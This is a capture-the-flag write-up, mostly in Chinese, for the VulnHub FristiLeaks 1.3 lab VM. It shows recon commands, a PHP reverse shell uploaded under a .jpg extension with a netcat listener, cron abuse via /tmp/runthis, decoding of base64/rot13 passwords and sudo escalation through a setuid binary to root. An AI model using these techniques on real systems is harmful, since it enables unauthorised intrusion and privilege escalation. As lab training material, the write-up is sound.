FristiLeaks: 1.3

Reference

• https://www.vulnhub.com/entry/fristileaks-13,133/
• http://www.hackingarticles.in/hack-fristileaks-vm-ctf-challenge/
• https://sdsdkkk.github.io/2015/vulnhub-fristileaks-writeup/

Write-up

• Recon:
  • nmap -A 10.0.2.144

    80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
    | http-methods:
    |_  Potentially risky methods: TRACE
    | http-robots.txt: 3 disallowed entries
    |_/cola /sisi /beer
    |_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
    |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
    

  • nikto -host 10.0.2.144

    + Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    + Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    + Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    + "robots.txt" contains 3 entries which should be manually viewed.
    

  • robots.txt裡的/cola、/sisi和/beer無額外線索
  • 由於上述三種線索都是飲料名，加上首頁有提到KEEP CALM AND DRINK FRISTI，所以試試FRISTI => Bingo
• http://10.0.2.144/fristi => 是一個登入頁面
  • 右鍵檢視原始碼有個作者名為eezeepz
  • 圖片是個很長的base64編碼圖片，而最後有另外一個註解掉的base64編碼，我們試試將它顯示出來：

    iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
    jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
    S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
    B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
    m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
    Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
    DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
    jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
    12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
    uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
    04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
    i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
    tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
    30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
    3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
    ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
    mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
    rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
    EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
    AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
    CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
    U5ErkJggg==
    

    • 將上述的base64編碼貼至原本圖片base64編碼的位置：

      data:img/png;base64, iVBORw0KGgo...U5ErkJggg==
      

    • 變成顯示另一張圖片，內容為：KeKkeKKeKKeKkEkkEk
  • 使用eezeepz:KeKkeKKeKKeKkEkkEk來登入
• 上傳php後門，並新增副檔名php-reverse-shell.php.jpg
  • remote server監聽1234 port: nc -vnlp 1234
  • 連線開啟shell: 10.0.2.144/fristi/uploads/php-reverse-shell.php.jpg
• Spawn a tty:

  echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
  python /tmp/asdf.py
  

• 在/home/eezeepz/下發現notes.txt：

  cat notes.txt
  Yo EZ,
  
  I made it possible for you to do some automated checks, 
  but I did only allow you access to /usr/bin/* system binaries. I did
  however copy a few extra often needed commands to my 
  homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
  from /home/admin/
  
  Don't forget to specify the full path for each binary!
  
  Just put a file called "runthis" in /tmp/, each line one command. The 
  output goes to the file "cronresult" in /tmp/. It should 
  run every minute with my account privileges.
  
  - Jerry
  

  • 其中提到可以從/home/admin/執行chmod指令，並且cron會定時執行/tmp/底下的script：
    • echo "/home/admin/chmod -R 777 /home/admin" > /tmp/runthis
    • 接著就有權限進入/home/admin/了

• /home/admin/底下有三個線索：

  bash-4.1$ cat whoisyourgodnow.txt
  =RFn0AKnlMHMPIzpyuTI0ITG
  

  bash-4.1$ cat cryptedpass.txt
  mVGZ3O3omkJLmy2pcuTq
  

  bash-4.1$ cat cryptpass.py
  #Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
  

  import base64,codecs,sys
  
  def encodeString(str):
      base64string= base64.b64encode(str)
      return codecs.encode(base64string[::-1], 'rot13')
  
  cryptoResult=encodeString(sys.argv[1])
  print cryptoResult
  

  • 可看出cryptpass.py是加密程式，因此可以寫一個解密程式，得到thisisalsopw123

  import base64,codecs,sys
  
  ciphertext = 'mVGZ3O3omkJLmy2pcuTq'
  decoded_codecs = codecs.encode(ciphertext[::-1], 'rot13')
  plaintext = base64.b64decode(decoded_codecs)
  print plaintext
  

  • 同樣解另一組密碼得到LetThereBeFristi!
  • 登入fristigod:LetThereBeFristi!
• 查看在/var/fristigod/底下的.bash_history：

  sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
  

  • doCom帶有setuid屬性且以root身份執行：
    • -rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom
  • 查看自己可以執行那些命令：sudo -l

    User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
    

    • fristigod允許以fristi身份來執行doCom
  • 透過fristi身份執行dCom，再呼叫/bin/sh，取得shell：
    • sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/sh
• 在/root/底下取得Flag: Y0u_kn0w_y0u_l0ve_fr1st1